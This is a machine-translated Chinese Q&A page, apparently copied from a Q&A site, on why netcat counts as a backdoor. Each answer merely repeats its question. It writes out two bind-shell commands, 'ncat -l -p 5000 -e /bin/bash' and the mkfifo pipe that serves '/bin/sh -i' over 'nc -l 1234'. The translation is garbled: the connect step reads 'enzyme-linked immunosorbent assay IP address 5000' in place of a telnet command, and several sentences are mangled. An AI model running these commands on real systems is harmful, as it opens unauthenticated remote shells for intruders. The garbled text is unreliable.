“netcat 可以用作后门”的含义

Question 1

使用 netcat，普通用户可以生成远程 shell。例如，以下命令将允许远程用户访问端口 5000 上的 bash shell

ncat -l -p 5000 -e /bin/bash

一旦运行，攻击者所要做的就是：

酶联免疫吸附试验IP地址5000

您甚至可以在自己的计算机上尝试这个示例。

然而，只有在没有防火墙阻止访问端口 5000 的情况下，这才会通过互联网起作用。

Answer

使用 netcat，普通用户可以生成远程 shell。例如，以下命令将允许远程用户访问端口 5000 上的 bash shell

ncat -l -p 5000 -e /bin/bash

一旦运行，攻击者所要做的就是：

酶联免疫吸附试验IP地址5000

您甚至可以在自己的计算机上尝试这个示例。

然而，只有在没有防火墙阻止访问端口 5000 的情况下，这才会通过互联网起作用。

Question 2

任何可以监听传入网络连接的东西（如Perl、python、zsh、socat、inetd）都可以被视为后门。

nc我认为为什么某个程序比其他程序更可能被视为后门（尽管它在这方面的功能要少得多）的主要原因是它的手册页确实展示了这样一个后门的例子：

       $ rm -f /tmp/f; mkfifo /tmp/f
       $ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f

Answer

任何可以监听传入网络连接的东西（如Perl、python、zsh、socat、inetd）都可以被视为后门。

nc我认为为什么某个程序比其他程序更可能被视为后门（尽管它在这方面的功能要少得多）的主要原因是它的手册页确实展示了这样一个后门的例子：

       $ rm -f /tmp/f; mkfifo /tmp/f
       $ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f

相关内容